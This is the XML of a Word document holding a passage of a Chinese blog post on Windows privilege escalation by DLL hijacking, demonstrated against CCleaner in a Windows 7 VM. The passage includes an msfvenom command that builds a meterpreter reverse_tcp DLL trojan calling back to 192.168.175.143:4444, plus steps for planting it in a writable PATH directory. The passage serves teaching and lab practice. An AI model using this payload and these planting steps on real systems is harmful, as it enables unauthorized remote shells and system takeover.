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ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="574C4C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="574C4C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>今天给大家讲一讲我自己的骚姿势，虽然技术内容都不是我自己发明的，但是我将几种技术杂糅在一起之后居然产生了让我自己都感到惊讶的效果！！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="6" w:space="3"/>
          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="105" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/" \l "0x01-DLL-%E5%8A%AB%E6%8C%81%E5%8E%9F%E7%90%86" \o "0x01. DLL 劫持原理" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>0x01. DLL 劫持原理</w:t>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E5%8E%9F%E7%90%86%EF%BC%9A%E7%A8%8B%E5%BA%8F%E9%80%9A%E5%B8%B8%E4%B8%8D%E8%83%BD%E9%9D%A0%E8%87%AA%E5%B7%B1%E8%87%AA%E5%8A%A8%E8%BF%90%E8%A1%8C%EF%BC%8C%E5%AE%83%E4%BB%AC%E5%BE%80%E5%BE%80%E9%9C%80%E8%A6%81%E8%B0%83%E7%94%A8%E8%AE%B8%E5%A4%9A%E8%B5%84%E6%BA%90%EF%BC%88%E4%B8%BB%E8%A6%81%E6%98%AFDLL-%E6%96%87%E4%BB%B6%EF%BC%8CWindows-%E4%B8%AD%E7%9A%84%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E5%BA%93%EF%BC%89%E3%80%82%E5%A6%82%E6%9E%9C%E7%A8%8B%E5%BA%8F%E6%88%96%E8%80%85%E6%9C%8D%E5%8A%A1%E4%BB%8E%E4%B8%80%E4%B8%AA%E6%88%91%E4%BB%AC%E6%8B%A5%E6%9C%89%E5%86%99%E6%9D%83%E9%99%90%E7%9A%84%E7%9B%AE%E5%BD%95%E9%87%8C%E5%8A%A0%E8%BD%BD%E6%96%87%E4%BB%B6%E6%97%B6%EF%BC%8C%E6%88%91%E4%BB%AC%E5%B0%B1%E8%83%BD%E5%A4%9F%E5%88%A9%E7%94%A8%E8%BF%99%E4%B8%80%E7%82%B9%E6%9D%A5%E5%BC%B9shell%EF%BC%8C%E5%BD%93%E7%84%B6%E8%BF%99%E4%B8%AAshell-%E7%9A%84%E6%9D%83%E9%99%90%E4%B9%9F%E5%B0%B1%E6%98%AF%E8%AF%A5%E7%A8%8B%E5%BA%8F%E6%89%80%E6%8B%A5%E6%9C%89%E7%9A%84%E6%9D%83%E9%99%90%E3%80%82" \o "原理：程序通常不能靠自己自动运行，它们往往需要调用许多资源（主要是DLL 文件，Windows 中的动态链接库）。如果程序或者服务从一个我们拥有写权限的目录里加载文件时，我们就能够利用这一点来弹shell，当然这个shell 的权限也就是该程序所拥有的权限。"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原理：程序通常不能靠自己自动运行，它们往往需要调用许多资源（主要是DLL 文件，Windows 中的动态链接库）。如果程序或者服务从一个我们拥有写权限的目录里加载文件时，我们就能够利用这一点来弹shell，当然这个shell 的权限也就是该程序所拥有的权限。</w:t>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E5%8E%9F%E7%90%86%EF%BC%9A%E9%80%9A%E5%B8%B8%E6%9D%A5%E8%AF%B4Windows-%E7%A8%8B%E5%BA%8F%E4%BC%9A%E4%BD%BF%E7%94%A8%E4%B8%80%E4%B8%AA%E9%A2%84%E5%AE%9A%E4%B9%89%E6%90%9C%E7%B4%A2%E8%B7%AF%E5%BE%84%E5%8E%BB%E5%AF%BB%E6%89%BEDLL-%E6%96%87%E4%BB%B6%EF%BC%8C%E5%B9%B6%E4%B8%94%E4%BC%9A%E6%8C%89%E7%85%A7%E7%89%B9%E5%AE%9A%E7%9A%84%E9%A1%BA%E5%BA%8F%E6%9D%A5%E6%A3%80%E7%B4%A2%E8%BF%99%E4%BA%9B%E8%B7%AF%E5%BE%84%E3%80%82%E5%BD%93%E5%B0%86%E6%81%B6%E6%84%8F%E7%9A%84DLL-%E6%96%87%E4%BB%B6%E6%94%BE%E5%88%B0%E5%85%B6%E4%B8%AD%E4%B8%80%E4%B8%AA%E8%B7%AF%E5%BE%84%E4%B8%8B%EF%BC%8C%E5%B9%B6%E4%BF%9D%E8%AF%81%E8%AF%A5%E6%81%B6%E6%84%8FDLL-%E5%85%88%E4%BA%8E%E5%90%88%E6%B3%95%E7%9A%84DLL-%E8%A2%AB%E7%A8%8B%E5%BA%8F%E6%89%BE%E5%88%B0%E6%97%B6%E5%B0%B1%E4%BC%9A%E5%8F%91%E7%94%9FDLL-%E5%8A%AB%E6%8C%81%EF%BC%9B%E4%B9%9F%E5%8F%AF%E8%83%BD%E6%98%AF%E7%A8%8B%E5%BA%8F%E5%AF%BB%E6%89%BE%E7%9A%84DLL-%E6%96%87%E4%BB%B6%E5%90%8D%E5%9C%A8%E7%B3%BB%E7%BB%9F%E4%B8%AD%E5%B9%B6%E4%B8%8D%E5%AD%98%E5%9C%A8%EF%BC%8C%E8%BF%99%E6%97%B6%E6%88%91%E4%BB%AC%E5%8F%AA%E9%9C%80%E5%B0%86%E8%87%AA%E5%B7%B1%E5%AE%9A%E5%88%B6%E7%9A%84DLL-%E6%96%87%E4%BB%B6%E6%94%BE%E5%88%B0%E7%A8%8B%E5%BA%8F%E7%9A%84%E6%90%9C%E7%B4%A2%E8%B7%AF%E5%BE%84%E4%B9%9F%E5%8F%AF%E4%BB%A5%E8%BE%BE%E5%88%B0%E7%9B%AE%E7%9A%84" \o "原理：通常来说Windows 程序会使用一个预定义搜索路径去寻找DLL 文件，并且会按照特定的顺序来检索这些路径。当将恶意的DLL 文件放到其中一个路径下，并保证该恶意DLL 先于合法的DLL 被程序找到时就会发生DLL 劫持；也可能是程序寻找的DLL 文件名在系统中并不存在，这时我们只需将自己定制的DLL 文件放到程序的搜索路径也可以达到目的"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原理：通常来说Windows 程序会使用一个预定义搜索路径去寻找DLL 文件，并且会按照特定的顺序来检索这些路径。当将恶意的DLL 文件放到其中一个路径下，并保证该恶意DLL 先于合法的DLL 被程序找到时就会发生DLL 劫持；也可能是程序寻找的DLL 文件名在系统中并不存在，这时我们只需将自己定制的DLL 文件放到程序的搜索路径也可以达到目的</w:t>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"%E4%B8%8B%E9%9D%A2%E4%BD%A0%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E5%9C%A8%E4%B8%80%E4%B8%AA32-%E4%BD%8D%E7%B3%BB%E7%BB%9F%E4%B8%ADDLL-%E7%9A%84%E6%90%9C%E7%B4%A2%E9%A1%BA%E5%BA%8F%EF%BC%9A" \o "下面你可以看到在一个32 位系统中DLL 的搜索顺序："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下面你可以看到在一个32 位系统中DLL 的搜索顺序：</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5" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="127" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear"/>
            <w:noWrap/>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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8179"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1 - The directory from which the application loaded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2 - 32-bit System directory (C:\Windows\System32)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3 - 16-bit System directory (C:\Windows\System)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4 - Windows directory (C:\Windows)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5 - The current working directory (CWD)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6 - Directories in the PATH environment variable (system then user)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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E9%80%9A%E8%BF%87%E4%B8%8A%E9%9D%A2%E7%9A%84%E6%90%9C%E7%B4%A2%E8%B7%AF%E5%BE%84%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E7%AC%AC%E5%85%AD%E7%82%B9%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%EF%BC%8C%E8%BF%99%E4%B9%9F%E6%98%AF%E6%88%91%E4%BB%AC%E6%AF%94%E8%BE%83%E5%AE%B9%E6%98%93%E6%8E%A7%E5%88%B6%E7%9A%84%E8%B7%AF%E5%BE%84%EF%BC%8C%E5%A6%82%E6%9E%9C%E7%9B%AE%E6%A0%87%E8%A3%85%E6%9C%89python%EF%BC%8C%E9%82%A3%E4%B9%88Path-C-Python27-%E5%B0%B1%E6%98%AF%E6%88%91%E4%BB%AC%E5%8F%AF%E4%BB%A5%E6%8E%A7%E5%88%B6%E7%9A%84%E8%B7%AF%E5%BE%84%EF%BC%8C%E6%88%91%E4%BB%AC%E5%8F%AA%E9%9C%80%E8%A6%81%E5%B0%86%E6%81%B6%E6%84%8F%E5%AE%9A%E5%88%B6%E7%9A%84DLL-%E6%96%87%E4%BB%B6%E6%94%BE%E5%88%B0%E8%BF%99%E4%B8%AA%E7%9B%AE%E5%BD%95%E5%B0%B1%E5%8F%AF%E4%BB%A5%E3%80%82" \o "通过上面的搜索路径可以看到第六点环境变量，这也是我们比较容易控制的路径，如果目标装有python，那么Path = C:\\Python27 就是我们可以控制的路径，我们只需要将恶意定制的DLL 文件放到这个目录就可以。"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通过上面的搜索路径可以看到第六点环境变量，这也是我们比较容易控制的路径，如果目标装有python，那么Path = C:\Python27 就是我们可以控制的路径，我们只需要将恶意定制的DLL 文件放到这个目录就可以。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="6" w:space="3"/>
          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="105" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/" \l "0x02-%E5%AE%9E%E6%88%98%E6%BC%94%E7%A4%BA" \o "0x02. 实战演示" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>0x02. 实战演示</w:t>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1-%E9%A6%96%E5%85%88%E6%88%91%E5%9C%A8%E7%9F%A5%E4%B9%8E%E4%B8%8A%E9%9A%8F%E4%BE%BF%E6%90%9C%E4%BA%86%E7%82%B9%E5%85%B3%E4%BA%8EWindows-%E4%B8%AD%E7%9A%84%E8%BD%AF%E4%BB%B6%EF%BC%8C%E7%84%B6%E5%90%8E%E9%9A%8F%E4%BE%BF%E9%80%89%E4%BA%86%E4%B8%80%E4%B8%AA%E6%84%9F%E8%A7%89%E5%8F%AF%E8%83%BD%E5%AD%98%E5%9C%A8DLL-%E5%8A%AB%E6%8C%81%E7%9A%84%E8%BD%AF%E4%BB%B6%E5%AE%89%E8%A3%85%E5%88%B0%E6%88%91%E7%9A%84Windows-7-%E8%99%9A%E6%8B%9F%E6%9C%BA%E4%B8%AD" \o "1. 首先我在知乎上随便搜了点关于Windows 中的软件，然后随便选了一个感觉可能存在DLL 劫持的软件安装到我的Windows 7 虚拟机中"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1. 首先我在知乎上随便搜了点关于Windows 中的软件，然后随便选了一个感觉可能存在DLL 劫持的软件安装到我的Windows 7 虚拟机中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ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="304800" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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2-%E7%84%B6%E5%90%8E%E8%B0%83%E7%94%A8%E5%B7%A5%E5%85%B7-DllHijackAuditor-%E8%87%AA%E5%8A%A8%E6%A3%80%E6%B5%8B%E6%88%91%E4%BB%AC%E5%88%9A%E6%89%8D%E4%B8%8B%E8%BD%BD%E7%9A%84%E8%BD%AF%E4%BB%B6%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8DLL-%E5%8A%AB%E6%8C%81%EF%BC%8C%E6%A0%B9%E6%8D%AE%E4%B8%8B%E5%9B%BE%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E8%BF%99%E9%87%8C%E9%9D%A2%E5%AD%98%E5%9C%A8%E4%B8%80%E5%85%B1-5-%E4%B8%AADLL-%E6%96%87%E4%BB%B6%E5%8F%AF%E4%BE%9B%E6%88%91%E4%BB%AC%E6%81%B6%E6%84%8F%E5%8A%AB%E6%8C%81%EF%BC%8C%E8%BF%99%E6%98%AF%E6%88%91%E6%B2%A1%E6%83%B3%E5%88%B0%E7%9A%84%EF%BC%8C%E6%88%91%E7%A1%AE%E5%AE%9E%E6%98%AF%E5%9C%A8%E7%BD%91%E4%B8%8A%E9%9A%8F%E4%BE%BF%E6%90%9C%E4%BA%86%E4%B8%80%E4%B8%AA%E8%BD%AF%E4%BB%B6%E8%80%8C%E5%B7%B2%EF%BC%8C%E6%B2%A1%E6%83%B3%E5%88%B0%E5%B1%85%E7%84%B6%E4%BC%9A%E8%BF%99%E4%B9%88%E4%B8%8D%E7%BB%8F%E6%91%A7%E6%8A%98%EF%BC%81" \o "2. 然后调用工具 DllHijackAuditor 自动检测我们刚才下载的软件是否存在DLL 劫持，根据下图可以看到这里面存在一共 5 个DLL  文件可供我们恶意劫持，这是我没想到的，我确实是在网上随便搜了一个软件而已，没想到居然会这么不经摧折！"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2. 然后调用工具 </w:t>
      </w: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"https://securityxploded.com/getsoftware_direct.php?id=7777" \t "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8B%EF%BC%89/_blank"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Style w:val="7"/>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>DllHijackAuditor</w:t>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 自动检测我们刚才下载的软件是否存在DLL 劫持，根据下图可以看到这里面存在一共 5 个DLL 文件可供我们恶意劫持，这是我没想到的，我确实是在网上随便搜了一个软件而已，没想到居然会这么不经摧折！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hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="304800" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7"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3-%E6%8E%A5%E4%B8%8B%E6%9D%A5%E6%88%91%E4%BB%AC%E5%88%A9%E7%94%A8msfvenom-%E7%94%9F%E6%88%90%E6%96%87%E4%BB%B6%E5%90%8D%E4%B8%BAext-ms-win-kernel32-package-current-l1-1-0-dll-%E7%9A%84-DLL-%E6%9C%A8%E9%A9%AC%EF%BC%8C%E7%94%A8%E4%BA%8E%E8%BF%9B%E8%A1%8CDLL-%E5%8A%AB%E6%8C%81%E3%80%82" \o "3. 接下来我们利用msfvenom 生成文件名为ext-ms-win-kernel32-package-current-l1-1-0.dll 的 DLL 木马，用于进行DLL 劫持。"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3. 接下来我们利用msfvenom 生成文件名为ext-ms-win-kernel32-package-current-l1-1-0.dll 的 DLL 木马，用于进行DLL 劫持。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4" w:beforeAutospacing="0" w:after="84" w:afterAutospacing="0" w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.175.143 lport=4444 -f dll -o /root/ext-ms-win-kernel32-package-current-l1-1-0.dll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hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="304800" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片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4-%E6%9F%A5%E7%9C%8BWindows-%E7%9A%84%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%EF%BC%8C%E5%B9%B6%E5%B0%86DLL-%E6%9C%A8%E9%A9%AC%E6%96%87%E4%BB%B6%E6%94%BE%E5%85%A5%E5%8F%AF%E6%8E%A7%E7%9A%84%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E4%B8%AD-%E8%BF%99%E6%A0%B7%E5%BD%93%E6%88%91%E4%BB%AC%E5%90%AF%E5%8A%A8CCleaner-%E8%BD%AF%E4%BB%B6%E7%9A%84%E6%97%B6%E5%80%99%E5%B0%B1%E4%BC%9A%E8%B0%83%E7%94%A8%E6%88%91%E4%BB%AC%E7%9A%84DLL-%E6%9C%A8%E9%A9%AC%E6%96%87%E4%BB%B6%E5%8F%8D%E5%BC%B9shell" \o "4. 查看Windows 的环境变量，并将DLL 木马文件放入可控的环境变量中,这样当我们启动CCleaner 软件的时候就会调用我们的DLL 木马文件反弹shell"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4. 查看Windows 的环境变量，并将DLL 木马文件放入可控的环境变量中,这样当我们启动CCleaner 软件的时候就会调用我们的DLL 木马文件反弹shell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4" w:beforeAutospacing="0" w:after="84" w:afterAutospacing="0" w:line="26" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>echo %path%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hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="258FB8"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="304800" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
